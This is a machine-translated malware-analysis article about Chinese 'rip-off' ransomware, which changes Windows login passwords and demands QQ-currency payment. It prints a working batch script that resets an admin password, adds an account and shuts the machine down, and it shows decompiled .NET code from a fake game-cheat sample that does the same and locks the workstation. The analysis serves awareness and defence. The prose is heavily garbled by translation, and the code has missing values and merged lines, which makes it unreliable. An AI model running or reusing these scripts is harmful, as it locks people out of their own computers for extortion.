Virus Trojan Avira No. 013: one based on. NET "rip-off" virus research

First, preface

Since the development of malicious programs, its function has been from the original simple destruction, and constantly develop into privacy snooping, information theft, and even now very popular "rip-off" virus, for extortion. As the development of the Times, the authors of the virus often want to use their own technology to obtain ill-gotten gains, becoming more and more utilitarian . And this series of articles also conform to this development, from the virus discussion to Trojans, and then came to the "rip off" the discussion of the virus.

second, what is the "rip-off" virus

In fact, "rip-off" virus behavior is very simple, it is to tamper with our computer's power-on password, and then the virus author left personal contact, let the victim to contact him, spend money to eliminate disaster. "RIP-off" mainly through the QQ group and mail dissemination, often disguised as similar to "CF free brush gun non-toxic software" (such as the study of CF.exe), "Free brush Q currency" and other very attractive names, once the user click to run, the system login password will be tampered with. And ordinary users encounter this situation, often powerless, plus "blackmail" money is generally not large, so money to buy the password is not a few people. Because this virus does not require the writer to have the very advanced skill level , thus also encourages "the rip-off" the prevalence. Here's an example of the simplest "rip-off" code, which is a batch (. bat) File:

@echo offnet user Jiang Ye wojiushimimanet user to Password plus QQ123456789 wojiushimima/addshutdown.exe-s-t 10

Here is a brief explanation of the above code. The second line of code means to change the account password named "Jiang Ye" to "Wojiushimima" (I am the password). Note that in my system, the account "Jiang Ye" is the administrator account, and in most cases, the system default Administrator account name is "Administrator", so the specific situation to be analyzed. We also call on you not to use "Administrator" as the Administrator account name, lest it be exploited by malicious programs. The third line of the code means to create an account called "Password plus QQ123456789", whose password is also "Wojiushimima". Line Fourth of the code means that the computer is shut down after 10 seconds. Run the above code:

Figure 1 Running the "RIP" virus

After the program runs for 10 seconds, the auto power off, and then power on, as shown in:

Figure 2

Visible, there are two accounts, one is the original account, but the password has been modified. Another account is the contact information of the virus author, we also do not know the password of the account. At this point, ordinary computer users in order to be able to use their own computer, it is only to contact the virus author, to buy the password.

iii. what is. NET

Since this article is talking about a model based on the. NET "rip-off", then it is necessary to briefly discuss what is. Net.

In fact. NET is a Microsoft-designed platform that is independent of the operating system and can be seen as a set of virtual machines, no matter what operating system the machine is running on, as long as the system is installed. NET Framework, you can run it. NET executable, enjoy based on the. NET of all kinds of services. The above statement is from the perspective of the user, if you understand from the perspective of the Windows system. NET is a series of DLL files running on the RING3 layer.

Perhaps that is still more abstract, interested readers can query the relevant books for further study. I personally think that we do not need to care too much about this definition, as a virus analyst, more important is to master. NET platform of the reverse analysis method.

. NET has a feature, that is, whether the program is written in C #, or C + +, or VB, and ultimately compiled into. NET's intermediate language IL. and static analysis. NET program is to use the Anti-compilation tool to decompile the program's instruction bytes into IL instructions or high-level languages, by reading the anti-compilation code to master the process and function of the program. Because. NET executable file has both metadata and IL code, its static decompile code is very readable, almost equivalent to the source code.

. The ILDASM and reflector are most commonly used by the anti-compilation tools of the net platform. I'm going to use the latter for analysis here. The software has now become a paid version, you can download the 14-day full-featured trial version in http://www.red-gate.com/products/dotnet-development/reflector/.

iv. "rip-off" virus analysisThis time the virus sample named "CF.exe", from the name can be seen that it should be related to the game "through the fire", disguised as a game of auxiliary class program, is actually "rip-off." But what is special about it is its pioneering use. NET Framework, the moment looks different. Why I know it's adopted. NET Framework? This is the credit of Peid:

Figure 3

Then use reflector to load the virus sample. Because the code generated by reflector analysis is just like the source code, it is easy to find the core location of the malicious program:

Figure 4

The complete code for this function is as follows:

private void Timer1_Tick (object sender, EventArgs e) {this.j++;        if (THIS.J <= 3) {this.label4.Text = "scanning CF network vulnerability \x00b7\x00b7\x00b7";    This.progressBar1.Value = THIS.J;        } else if ((THIS.J <= 5) && (THIS.J > 3)) {This.label4.Text = "Monitoring CF module SX action \x00b7\x00b7";    This.progressBar1.Value = THIS.J;        } else if (THIS.J < && (THIS.J > 5)) {This.label4.Text = "Avoid SX loading auxiliary module \X00B7\X00B7\X00B7";    This.progressBar1.Value = THIS.J;        } else if (THIS.J = =) {this.label4.Text = "module load successfully started in \X00B7\X00B7\X00B7";        This.progressBar1.Value = THIS.J;        Resetuserpassword (Environment.username, "RAZGGCD"); MessageBox.Show ("Anti-Plug alliance alert you: Green game healthy life together to create a fair competitive platform!") For your computer security please recharge 30QB with qq:1460459195 and add friends to ask for the password! Thank you for your cooperation!        "," hint message ", MessageBoxButtons.OK, Messageboxicon.asterisk);        Createntuser ("Add Q1460459195", "RAZGGCD", "" ");    Lockworkstation (); }}
 

Obviously, the program through the constant increase of the counter, thus displaying different text, which gives the user a false impression that the game assistance has been in effect, it seems to be running the same. When the counter is incremented to 10, the last if statement is executed. The Resetuserpassword in this statement is used to modify the user's password to "RAZGGCD" and then display a piece of information that allows the user to contact the virus author to obtain the password for a "rip-off". Next, create a user named "Add Q1460459195" with the password "RAZGGCD". Finally, lock the workstation to protect it from unauthorized use. This whole process is similar to the "rip-off" of the batch version I discussed earlier. Visible, although the virus changes the external form, but its internal mechanism has not changed.

Through the above analysis, we have obtained the password, then we are done.

v. SummaryCompared to the previous analysis of the virus Trojan, "RIP" analysis is actually very simple. Especially this based on. NET program, the Decompile program can be equated with the source program, more easily understood than the assembly code. Since the "rip-off" is the mainstream, so I will choose some more representative of the "rip-off" for research. I hope that we can improve the awareness of prevention, so that the writers of these procedures are inorganic.

Virus Trojan Avira No. 013: one based on. NET "rip-off" virus research